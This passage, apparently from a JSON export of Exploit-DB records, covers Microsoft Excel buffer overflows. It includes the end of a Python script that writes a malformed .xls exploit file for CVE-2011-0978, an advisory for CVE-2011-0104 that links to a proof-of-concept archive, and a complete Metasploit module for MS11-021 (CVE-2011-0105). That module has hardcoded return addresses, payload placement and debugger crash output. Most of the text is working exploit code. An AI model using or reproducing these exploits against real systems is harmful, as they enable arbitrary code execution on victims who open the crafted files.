0000000\"\r\nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\nwD+=\"000000000000000000000000000000000000000000000000000000000000000000010000000\"\r\nwD+=\"2000000030000000400000005000000060000000700000008000000090000000a0000000b00\"\r\nwD+=\"00000c0000000d0000000e0000000f000000100000001100000012000000130000001400000\"\r\nwD+=\"015000000160000001700000018000000190000001a0000001b0000001c0000001d0000001e\"\r\nwD+=\"0000001f0000002000000021000000220000002300000024000000250000002600000027000\"\r\nwD+=\"00028000000290000002a0000002b0000002c0000002d0000002e0000002f00000030000000\"\r\nwD+=\"3100000032000000330000003400000035000000360000003700000038000000390000003a0\"\r\nwD+=\"000003b0000003c0000003d0000003e0000003f000000400000004100000042000000feffff\"\r\nwD+=\"ff4400000045000000460000004700000048000000490000004a000000feffffff4c0000004\"\r\nwD+=\"d0000004e0000004f000000500000005100000052000000fefffffffdfffffffeffffffffff\"\r\nwD+=\"fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff\"\r\nwD+=\"fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff\"\r\nwD+=\"fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff\"\r\nwD+=\"fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff\"\r\nwD+=\"ffffffffffffffffffffffffffffffffffffffff52006f006f007400200045006e007400720\"\r\nwD+=\"079000000000000000000000000000000000000000000000000000000000000000000000000\"\r\nwD+=\"00000000000000000016000501ffffffffffffffff020000002008020000000000c00000000\"\r\nwD+=\"000004600000000000000000000000000f9dd43b205cc01feffffff00000000000000005700\"\r\nwD+=\"6f0072006b0062006f006f006b0000000000000000000000000000000000000000000000000\"\r\nwD+=\"000000000000000000000000000000000000000000000000012000201ffffffffffffffffff\"\r\nwD+=\"ffffff000000000000000000000000000000000000000000000000000000000000000000000\"\r\nwD+=\"000000000002b850000000000000500530075006d006d0061007200790049006e0066006f00\"\r\nwD+=\"72006d006100740069006f006e0000000000000000000000000000000000000000000000000\"\r\nwD+=\"00000280002010100000003000000ffffffff00000000000000000000000000000000000000\"\r\nwD+=\"0000000000000000000000000000000000430000000010000000000000050044006f0063007\"\r\nwD+=\"5006d0065006e007400530075006d006d0061007200790049006e0066006f0072006d006100\"\r\nwD+=\"740069006f006e000000000000000000000038000201ffffffffffffffffffffffff0000000\"\r\nwD+=\"000000000000000000000000000000000000000000000000000000000000000004b00000000\"\r\nwD+=\"10000000000000\"\r\n\r\n\r\nFILE = open('webDEViL-CVE-2011-0978.xls',\"wb\")\r\nbacktobin=binascii.unhexlify(wD)\r\nFILE.write(backtobin)\r\nFILE.close()\r\n\r\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/17227/"}, {"lastseen": "2016-02-04T01:33:58", "bulletinFamily": "exploit", "description": "Microsoft Excel CVE-2011-0104 Buffer Overflow Vulnerability. CVE-2011-0104. Remote exploit for windows platform", "modified": "2011-04-12T00:00:00", "published": "2011-04-12T00:00:00", "id": "EDB-ID:35573", "href": "https://www.exploit-db.com/exploits/35573/", "type": "exploitdb", "title": "Microsoft Excel - Buffer Overflow Vulnerability", "sourceData": "source: http://www.securityfocus.com/bid/47245/info\r\n\r\nMicrosoft Excel is prone to a buffer-overflow vulnerability.\r\n\r\nAttackers can exploit this issue by enticing an unsuspecting user to open a specially crafted Excel file.\r\n\r\nSuccessful exploits can allow attackers to execute arbitrary code with the privileges of the user running the application. Failed exploit attempts will result in a denial-of-service condition. \r\n\r\nhttps://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/35573.zip", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/35573/"}, {"lastseen": "2016-02-02T09:09:25", "bulletinFamily": "exploit", "description": "MS11-021 Microsoft Office 2007 Excel .xlb Buffer Overflow. CVE-2011-0105. Local exploit for windows platform", "modified": "2011-11-05T00:00:00", "published": "2011-11-05T00:00:00", "id": "EDB-ID:18087", "href": "https://www.exploit-db.com/exploits/18087/", "type": "exploitdb", "title": "Microsoft Office 2007 Excel .xlb Buffer Overflow MS11-021", "sourceData": "##\r\n# $Id: ms11_021_xlb_bof.rb 14172 2011-11-06 20:16:34Z sinn3r $\r\n##\r\n\r\n##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = NormalRanking\r\n\r\n\tinclude Msf::Exploit::FILEFORMAT\r\n\r\n\tdef initialize(info={})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name' => \"MS11-021 Microsoft Office 2007 Excel .xlb Buffer Overflow\",\r\n\t\t\t'Description' => %q{\r\n\t\t\t\t\tThis module exploits a vulnerability found in Excel of Microsoft Office 2007.\r\n\t\t\t\tBy supplying a malformed .xlb file, an attacker can control the content (source)\r\n\t\t\t\tof a memcpy routine, and the number of bytes to copy, therefore causing a stack-\r\n\t\t\t\tbased buffer overflow. This results aribrary code execution under the context of\r\n\t\t\t\tuser the user.\r\n\t\t\t},\r\n\t\t\t'License' => MSF_LICENSE,\r\n\t\t\t'Version' => \"$Revision: 14172 $\",\r\n\t\t\t'Author' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t'Aniway', #Initial discovery (via ZDI)\r\n\t\t\t\t\t'abysssec', #RCA, poc\r\n\t\t\t\t\t'sinn3r', #Metasploit\r\n\t\t\t\t\t'juan vazquez' #Metasploit\r\n\t\t\t\t],\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t['CVE', '2011-0105'],\r\n\t\t\t\t\t['MSB', 'MS11-021'],\r\n\t\t\t\t\t['URL', 'http://www.zerodayinitiative.com/advisories/ZDI-11-121/'],\r\n\t\t\t\t\t['URL', 'http://www.abysssec.com/blog/2011/11/02/microsoft-excel-2007-sp2-buffer-overwrite-vulnerability-ba-exploit-ms11-021/']\r\n\t\t\t\t],\r\n\t\t\t'Payload' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'StackAdjustment' => -3500,\r\n\t\t\t\t},\r\n\t\t\t'DefaultOptions' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'ExitFunction' => \"process\",\r\n\t\t\t\t\t'DisablePayloadHandler' => 'true',\r\n\t\t\t\t\t'InitialAutoRunScript' => 'migrate -f'\r\n\t\t\t\t},\r\n\t\t\t'Platform' => 'win',\r\n\t\t\t'Targets' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t# Win XP SP3 (Vista and 7 will try to repair the file)\r\n\t\t\t\t\t['Microsoft Office Excel 2007 on Windows XP', {'Ret' => 0x3006A48D }], # JMP ESP in EXCEL (Office 2007)\r\n\t\t\t\t\t['Microsoft Office Excel 2007 SP2 on Windows XP', {'Ret'=>0x3006b185}], #JMP ESP in excel\r\n\t\t\t\t],\r\n\t\t\t'Privileged' => false,\r\n\t\t\t'DisclosureDate' => \"Aug 9 2011\",\r\n\t\t\t'DefaultTarget' => 0))\r\n\r\n\t\t\tregister_options(\r\n\t\t\t\t[\r\n\t\t\t\t\tOptString.new('FILENAME', [true, 'The filename', 'msf.xlb'])\r\n\t\t\t\t], self.class)\r\n\tend\r\n\r\n\tdef exploit\r\n\t\tpath = File.join(Msf::Config.install_root, 'data', 'exploits', 'CVE-2011-0105.xlb')\r\n\t\tf = File.open(path, 'rb')\r\n\t\ttemplate = f.read\r\n\t\tf.close\r\n\r\n\t\tp = payload.encoded\r\n\r\n\t\t# Offset 1556\r\n\t\trecord = ''\r\n\t\trecord << \"\\xa7\\x00\" #record type\r\n\t\trecord << \"\\x04\\x00\" #record length\r\n\t\tif target.name =~ /Excel 2007 SP2/ # Microsoft Office Excel 2007 SP2\r\n\t\t\trecord << \"\\xb0\\x0d\\x0c\\x00\" #data\r\n\t\telse\r\n\t\t\trecord << \"\\xb0\\x0f\\x0c\\x00\" #data\r\n\t\tend\r\n\r\n\t\t# Offset 1564\r\n\t\tcontinue_record = ''\r\n\t\tcontinue_record << \"\\x3c\\x00\" #record type\r\n\t\tcontinue_record << [p.length+32].pack('v') #length\r\n\r\n\t\tbuf = ''\r\n\t\tbuf << template[0, 1556]\r\n\t\tbuf << record\r\n\t\tbuf << continue_record\r\n\t\tbuf << rand_text_alpha(1)\r\n\t\tbuf << [target.ret].pack('V*')\r\n\t\tbuf << \"\\x00\"*12\r\n\t\tbuf << p\r\n\t\tbuf << template[2336, template.length]\r\n\r\n\t\tfile_create(buf)\r\n\tend\r\nend\r\n\r\n=begin\r\n0:000> r\r\neax=41414141 ebx=00000000 ecx=00000006 edx=008c1504 esi=0000007f edi=00000005\r\neip=301a263d esp=00137ef8 ebp=00137f6c iopl=0 nv up ei pl nz na pe nc\r\ncs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206\r\nEXCEL!Ordinal40+0x1a263d:\r\n301a263d 8908 mov dword ptr [eax],ecx ds:0023:41414141=????????\r\n0:000> dc esp\r\n00137ef8 00000000 00000000 41414141 41414141 ........AAAAAAAA\r\n00137f08 41414141 41414141 41414141 41414141 AAAAAAAAAAAAAAAA\r\n00137f18 41414141 41414141 41414141 41414141 AAAAAAAAAAAAAAAA\r\n00137f28 41414141 41414141 41414141 41414141 AAAAAAAAAAAAAAAA\r\n00137f38 41414141 41414141 41414141 41414141 AAAAAAAAAAAAAAAA\r\n00137f48 41414141 41414141 41414141 41414141 AAAAAAAAAAAAAAAA\r\n00137f58 41414141 41414141 41414141 00000000 AAAAAAAAAAAA....\r\n00137f68 41414141 41414141 41414141 41414141 AAAAAAAAAAAAAAAA\r\n=end\r\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/18087/"}]}